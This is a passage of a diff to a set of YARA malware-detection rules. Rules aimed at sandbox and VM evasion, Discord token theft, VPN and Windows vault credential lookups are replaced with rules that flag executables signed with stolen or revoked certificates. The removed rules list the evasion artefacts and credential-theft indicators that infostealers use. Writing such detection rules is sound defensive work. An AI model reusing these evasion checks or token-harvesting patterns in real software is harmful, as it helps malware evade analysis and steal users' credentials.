-		description = "Detects executables potentially checking for WinJail sandbox window"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "10a70ad3-c37e-5522-ae3f-3f85f89f9394"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "cb2aa5d6-913e-5d74-a903-1cb88fb63b1c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1524-L1543"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6044-L6056"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "084a1613eaf1df4cd54c44e4389b9edc1c44b4b947a8c4416cb7cbdabc186747"
-		score = 40
-		quality = 45
+		hash = "0868a2a7b5e276d3a4a40cdef994de934d33d62a689d7207a31fd57d012ef948"
+		logic_hash = "04244701311fcdc77b1e3a8f20621e474ed607be3d109c629280d528e2f24e1f"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "0cb6bde041b58dbd4ec64bd5a3be38c50f17bb3d"
 		importance = 20
 
-	strings:
-		$s1 = "This file can't run into Virtual Machines" wide
-		$s2 = "This file can't run into Sandboxies" wide
-		$s3 = "This file can't run into RDP Servers" wide
-		$s4 = "Run without emulation" wide
-		$s5 = "Run using valid operating system" wide
-		$v1 = "SbieDll.dll" fullword wide
-		$v2 = "USER" fullword wide
-		$v3 = "SANDBOX" fullword wide
-		$v4 = "VIRUS" fullword wide
-		$v5 = "MALWARE" fullword wide
-		$v6 = "SCHMIDTI" fullword wide
-		$v7 = "CURRENTUSER" fullword wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or all of ( $v* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Piriform Software Ltd" and pe.signatures [ i ] . serial == "02:fa:99:4d:66:0d:e6:59:ee:90:37:ec:b4:37:d7:66" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Go_Golazagne : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0B446546C36525Bf5F084F6Bbbba7097 : FILE
 {
 	meta:
-		description = "Detects Go executables using GoLazagne"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3b54892d-8015-518c-af0b-03ddd65478f6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "608a410d-d34f-5eea-92db-3d156d01d360"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1545-L1554"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6058-L6071"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9618f8a6eb9a5db01b7a58a469309220b1e22afe928006d642e5404380f312f1"
-		score = 40
-		quality = 45
+		hash = "3163ffc06848f6c48ac460ab844470ef85a07b847bf187c2c9cb26c14032a1a5"
+		logic_hash = "6dcf87b929c28cc013ee5c9de85aa026e335e1e5c38a440bc6b5dc11c6bf9a91"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "05cdf79b0effff361dac0363adaa75b066c49de0"
 		importance = 20
 
-	strings:
-		$s1 = "/goLazagne/" ascii nocase
-		$s2 = "Go build ID:" ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "0b:44:65:46:c3:65:25:bf:5f:08:4f:6b:bb:ba:70:97" and 1608724800 <= pe.signatures [ i ] . not_after )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_CSPROJ : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E4E795Fd1Fd25595B869Ce22Aa7Dc49F : FILE
 {
 	meta:
-		description = "Detects suspicious .CSPROJ files then compiled with msbuild"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "99f9fbd0-9435-511a-b9f5-7ea11e655b79"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "8807c05d-c13b-58e8-9dda-c2eae6b5979c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1556-L1568"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6087-L6101"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e41c82ab0da47192463f76192ea7748dfcf59193475871daf1a7a4ff2fda4d52"
-		score = 40
-		quality = 45
+		logic_hash = "0aef5e2af3059597d218c544bc0b56078e1ef924af0530c62aa12679e0816410"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "269f25e6b7c690ae094086bd7825d03b48d4fcb1"
 		importance = 20
 
-	strings:
-		$s1 = "ToolsVersion=" ascii
-		$s2 = "/developer/msbuild/" ascii
-		$x1 = "[DllImport(\"\\x" ascii
-		$x2 = "VirtualAlloc(" ascii nocase
-		$x3 = "CallWindowProc(" ascii nocase
-
 	condition:
-		uint32( 0 ) == 0x6f72503c and ( all of ( $s* ) and 2 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Sandbox_Evasion_Filescomb : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008E0Fa6B464D466Df1B267504B04F7B27 : FILE
 {
 	meta:
-		description = "Detects executables referencing specific set of files observed in sandob anti-evation, and Emotet"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "04108277-03ac-5479-ac9f-0c7377dc70b8"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "6de3aab7-7175-537b-8a33-56cb0662b7a6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1694-L1711"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6103-L6114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9f235e212e75cef51e3321f49968c75523304dc94a2b7cf3965c9f88d039b43"
-		score = 40
-		quality = 23
+		logic_hash = "1f992d81b63108840d457f3f1906524cf4a9d4bec4a91f7bc826fae9989d40e0"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "91707c95044c5badcd51d198bdbe3a7ff3156c35"
 		importance = 20
 
-	strings:
-		$s1 = "c:\\take_screenshot.ps1" ascii wide nocase
-		$s2 = "c:\\loaddll.exe" ascii wide nocase
-		$s3 = "c:\\email.doc" ascii wide nocase
-		$s4 = "c:\\email.htm" ascii wide nocase
-		$s5 = "c:\\123\\email.doc" ascii wide nocase
-		$s6 = "c:\\123\\email.docx" ascii wide nocase
-		$s7 = "c:\\a\\foobar.bmp" ascii wide nocase
-		$s8 = "c:\\a\\foobar.doc" ascii wide nocase
-		$s9 = "c:\\a\\foobar.gif" ascii wide nocase
-		$s10 = "c:\\symbols\\aagmmc.pdb" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ApcWCjFsGXwbWUJrKZ" and pe.signatures [ i ] . serial == "00:8e:0f:a6:b4:64:d4:66:df:1b:26:75:04:b0:4f:7b:27" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_VM_Evasion_Virtdrvcomb : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_559Cb90Fd16E9D1Ad375F050Ab6A6616 : FILE
 {
 	meta:
-		description = "Detects executables referencing combination of virtualization drivers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "88f271d5-07a3-5ca6-9536-4f68bccf49bc"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "8b2ed295-5aae-5ced-9603-8125b4e261f9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1713-L1757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6116-L6127"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7bbd05e17b8a111b841ed2a86b4794cde8972a673acf331d800029e54d8f602"
-		score = 40
-		quality = 43
+		logic_hash = "a91f23e2281efb95b780b26018f1c89485a87c6541ac84025dad3e6dd55c742e"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "78a149f9a04653b01df09743571df938f9873fa5"
 		importance = 20
 
-	strings:
-		$p1 = "prleth.sys" ascii wide
-		$p2 = "prlfs.sys" ascii wide
-		$p3 = "prlmouse.sys" ascii wide
-		$p4 = "prlvideo.sys	" ascii wide
-		$p5 = "prltime.sys" ascii wide
-		$p6 = "prl_pv32.sys" ascii wide
-		$p7 = "prl_paravirt_32.sys" ascii wide
-		$vb1 = "VBoxMouse.sys" ascii wide
-		$vb2 = "VBoxGuest.sys" ascii wide
-		$vb3 = "VBoxSF.sys" ascii wide
-		$vb4 = "VBoxVideo.sys" ascii wide
-		$vb5 = "vboxdisp.dll" ascii wide
-		$vb6 = "vboxhook.dll" ascii wide
-		$vb7 = "vboxmrxnp.dll" ascii wide
-		$vb8 = "vboxogl.dll" ascii wide
-		$vb9 = "vboxoglarrayspu.dll" ascii wide
-		$vb10 = "vboxoglcrutil.dll" ascii wide
-		$vb11 = "vboxoglerrorspu.dll" ascii wide
-		$vb12 = "vboxoglfeedbackspu.dll" ascii wide
-		$vb13 = "vboxoglpackspu.dll" ascii wide
-		$vb14 = "vboxoglpassthroughspu.dll" ascii wide
-		$vb15 = "vboxservice.exe" ascii wide
-		$vb16 = "vboxtray.exe" ascii wide
-		$vb17 = "VBoxControl.exe" ascii wide
-		$vp1 = "vmsrvc.sys" ascii wide
-		$vp2 = "vpc-s3.sys" ascii wide
-		$vw1 = "vmmouse.sys" ascii wide
-		$vw2 = "vmnet.sys" ascii wide
-		$vw3 = "vmxnet.sys" ascii wide
-		$vw4 = "vmhgfs.sys" ascii wide
-		$vw5 = "vmx86.sys" ascii wide
-		$vw6 = "hgfs.sys" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $p* ) and ( 2 of ( $vb* ) or 2 of ( $vp* ) or 2 of ( $vw* ) ) ) or ( 2 of ( $vb* ) and ( 2 of ( $p* ) or 2 of ( $vp* ) or 2 of ( $vw* ) ) ) or ( 2 of ( $vp* ) and ( 2 of ( $p* ) or 2 of ( $vb* ) or 2 of ( $vw* ) ) ) or ( 2 of ( $vw* ) and ( 2 of ( $p* ) or 2 of ( $vb* ) or 2 of ( $vp* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "55:9c:b9:0f:d1:6e:9d:1a:d3:75:f0:50:ab:6a:66:16" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Nonewindowsua : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Eb95A7Bd7553533D : FILE
 {
 	meta:
-		description = "Detects Windows executables referencing non-Windows User-Agents"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3bf62a67-4c21-5bcc-a356-424e798141f1"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b9198469-4eba-552d-a8f5-5841893ff85e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1759-L1784"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6159-L6170"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb65643fd93ce4dbec0f98259b3dacda748a3f62f71258726073fdb3e354ab42"
-		score = 40
-		quality = 45
+		logic_hash = "e646346d94791c2a86a7240d4cf1f9138a30ca583b021ae5b17471cef20a98de"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "8d658fd671fa097c3db18906a29e8c1fa45113d9"
 		importance = 20
 
-	strings:
-		$ua1 = "Mozilla/5.0 (Macintosh; Intel Mac OS" wide ascii
-		$ua2 = "Mozilla/5.0 (iPhone; CPU iPhone OS" ascii wide
-		$ua3 = "Mozilla/5.0 (Linux; Android " ascii wide
-		$ua4 = "Mozilla/5.0 (PlayStation " ascii wide
-		$ua5 = "Mozilla/5.0 (X11; " wide ascii
-		$ua6 = "Mozilla/5.0 (Windows Phone " ascii wide
-		$ua7 = "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)" wide ascii
-		$ua8 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)" wide ascii
-		$ua9 = "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)" wide ascii
-		$ua10 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)" wide ascii
-		$ua11 = "Mozilla/5.0 (BlackBerry; U; BlackBerry " wide ascii
-		$ua12 = "Mozilla/5.0 (iPad; CPU OS" wide ascii
-		$ua13 = "Mozilla/5.0 (iPad; U;" ascii wide
-		$ua14 = "Mozilla/5.0 (IE 11.0;" ascii wide
-		$ua15 = "Mozilla/5.0 (Android;" ascii wide
-		$ua16 = "User-Agent: Internal Wordpress RPC connection" ascii wide
-		$ua17 = "Mozilla / 5.0 (SymbianOS" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\x02C\\x02\\x97\\x04\\x17\\x04\\x1e\\x04.\\x02\\x90\\x00g\\x02\\x94\\x02\\xae\\x00p\\x04 \\x00K\\x04J\\x02\\x88\\x042\\x02K\\x02\\xa3" and pe.signatures [ i ] . serial == "eb:95:a7:bd:75:53:53:3d" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Toomanywindowsua : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A1F3A057A1Dce4Bf7D76D0C7Adf837E : FILE
 {
 	meta:
-		description = "Detects executables referencing many varying, potentially fake Windows User-Agents"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "28dba61e-b2da-5708-b82f-a139d0929a7d"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "c4829ec0-b6be-5701-a4cf-e4b1205240b3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1786-L1810"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6172-L6184"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a79ea9b8471148176c210fe834e7b2f0549291956489e2853235a75ea3e4e1db"
-		score = 40
-		quality = 45
+		hash = "2df05a70d3ce646285a0f888df15064b4e73034b67e06d9a4f4da680ed62e926"
+		logic_hash = "de9ae66e497730db54fc21a745426c687c3a4d9819c08bc1dca0b42a5b8070ac"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "8279b87c89507bc6e209a7bd8b5c24b31fb9a6dc"
 		importance = 20
 
-	strings:
-		$ua1 = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" ascii wide
-		$ua2 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" ascii wide
-		$ua3 = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" ascii wide
-		$ua4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0" ascii wide
-		$ua5 = "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3" ascii wide
-		$ua6 = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)" ascii wide
-		$ua7 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" ascii wide
-		$ua8 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)" ascii wide
-		$ua9 = "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00" ascii wide
-		$ua10 = "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" ascii wide
-		$ua11 = "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14" ascii wide
-		$ua12 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14" ascii wide
-		$ua13 = "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02" ascii wide
-		$ua14 = "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00" ascii wide
-		$ua15 = "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00" ascii wide
-		$ua16 = "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7" ascii wide
-		$ua17 = "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Qihu Technology Co., Ltd." and pe.signatures [ i ] . serial == "0a:1f:3a:05:7a:1d:ce:4b:f7:d7:6d:0c:7a:df:83:7e" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_VM_Evasion_Macaddrcomb : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00849Ea0945Dd2Ea2Dc3Cc2486578A5715 : FILE
 {
 	meta:
-		description = "Detects executables referencing virtualization MAC addresses"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7e399d31-090a-57f7-89fa-0a2c4e563283"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "8584af2e-6b1e-5141-abbf-84e414ffaead"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1812-L1827"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6186-L6197"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53a87bffc327c38545d9f213834726af9a1fbe86f273e189dc355567e6a671bf"
-		score = 40
-		quality = 29
+		logic_hash = "824744510e73cd6717e3626a5a250466bfb5817fd7172fc32466c2e68e20947b"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "8c56adfb8fba825aa9a4ab450c71d45b950e55a4"
 		importance = 20
 
-	strings:
-		$s1 = "00:03:FF" ascii wide nocase
-		$s2 = "00:05:69" ascii wide nocase
-		$s3 = "00:0C:29" ascii wide nocase
-		$s4 = "00:16:3E" ascii wide nocase
-		$s5 = "00:1C:14" ascii wide nocase
-		$s6 = "00:1C:42" ascii wide nocase
-		$s7 = "00:50:56" ascii wide nocase
-		$s8 = "08:00:27" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Biglin" and pe.signatures [ i ] . serial == "00:84:9e:a0:94:5d:d2:ea:2d:c3:cc:24:86:57:8a:57:15" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Discord_Regex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0537F25A88E24Cafdd7919Fa301E8146 : FILE
 {
 	meta:
-		description = "Detects executables referencing Discord tokens regular expressions"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4c508cae-bb25-549b-8f35-a6a22928a9a3"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b0dd33b4-2040-5021-bebc-5ca26d75f14c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1890-L1898"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6215-L6227"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6be1dd8e25311442a59ee2afbd99f6e9663dd06919c07269b76238af0bbd5f2"
-		score = 40
-		quality = 43
+		hash = "72ac61e6311f2a6430d005052dbc0cc58587e7b75722b5e34a71081370f4ddd5"
+		logic_hash = "8cd68612354a756c4a52d6baea9ef6ed74c94f5fcf25baa2f72c1131e0828f84"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "922211f5ab4521941d26915aeb82ee728f931082"
 		importance = 20
 
-	strings:
-		$s1 = "[a-zA-Z0-9]{24}\\.[a-zA-Z0-9]{6}\\.[a-zA-Z0-9_\\-]{27}|mfa\\.[a-zA-Z0-9_\\-]{84}" ascii wide nocase
-
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them ) or all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "05:37:f2:5a:88:e2:4c:af:dd:79:19:fa:30:1e:81:46" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_VPN : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2E4A279Bde2Eb688E8Ab30F5904Fa875 : FILE
 {
 	meta:
-		description = "Detects executables referencing many VPN software clients. Observed in infosteslers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "301977a8-0619-50a2-a718-78ff9e039e65"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "3fd40418-9efe-5dfe-a4e2-01ff9c46a4d5"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1900-L1914"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6229-L6240"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5bef727d3c6fa7ea01c16e7b1fdf146b4cef58c06189bf8540bbfe7915790578"
-		score = 40
-		quality = 31
+		logic_hash = "768b2cb64f7ce359285721bbfd2f2f6aac4065ec234dc091933d962a7f0ab79a"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "0cdf4e992af760e59f3ea2f1648804d2a2b47bbc"
 		importance = 20
 
-	strings:
-		$s1 = "\\VPN\\NordVPN" ascii wide nocase
-		$s2 = "\\VPN\\OpenVPN" ascii wide nocase
-		$s3 = "\\VPN\\ProtonVPN" ascii wide nocase
-		$s4 = "\\VPN\\DUC\\" ascii wide nocase
-		$s5 = "\\VPN\\PrivateVPN" ascii wide nocase
-		$s6 = "\\VPN\\PrivateVPN" ascii wide nocase
-		$s7 = "\\VPN\\EarthVPN" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lespeed Technology Co., Ltd" and pe.signatures [ i ] . serial == "2e:4a:27:9b:de:2e:b6:88:e8:ab:30:f5:90:4f:a8:75" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Vaultschemaguid : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Fbe6758Ae785D7C678A4Ad8De5C3F7E6 : FILE
 {
 	meta:
-		description = "Detects executables referencing Windows vault credential objects. Observed in infostealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "440ac8a8-19c9-5284-a8e2-e0f2e8892a5e"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "4d080acc-fb11-5e4d-9c59-562f30376936"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1930-L1953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6242-L6253"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "121a51bbb749cc86d50fd5f79d7a24fbbb3e589e2fb25c553764a16202ff4065"
-		score = 40
-		quality = 45
+		logic_hash = "c6d84435c5c4f71696ce0414c87216bbb0603cb75d6e37abaf73e3708904032e"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "bd1958f0306fc8699e829541cd9b8c4fe0e0c6da920932f2cd4d78ed76bda426"
 		importance = 20
 
-	strings:
-		$s1 = "2F1A6504-0641-44CF-8BB5-3612D865F2E5" ascii wide
-		$s2 = "3CCD5499-87A8-4B10-A215-608888DD3B55" ascii wide
-		$s3 = "154E23D0-C644-4E6F-8CE6-5069272F999F" ascii wide
-		$s4 = "4BF4C442-9B8A-41A0-B380-DD4A704DDB28" ascii wide
-		$s5 = "77BC582B-F0A6-4E15-4E80-61736B6F3B29" ascii wide
-		$s6 = "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC" ascii wide
-		$s7 = "3E0E35BE-1B77-43E7-B873-AED901B6275B" ascii wide
-		$s8 = "3C886FF3-2669-4AA2-A8FB-3F6759A77548" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HORUM" and pe.signatures [ i ] . serial == "fb:e6:75:8a:e7:85:d7:c6:78:a4:ad:8d:e5:c3:f7:e6" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Antivm_UNK01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A73B6D821F84Db4451D6Eedd62C42848 : FILE
 {
 	meta:
-		description = "Detects memory artifacts referencing specific combination of anti-VM checks"
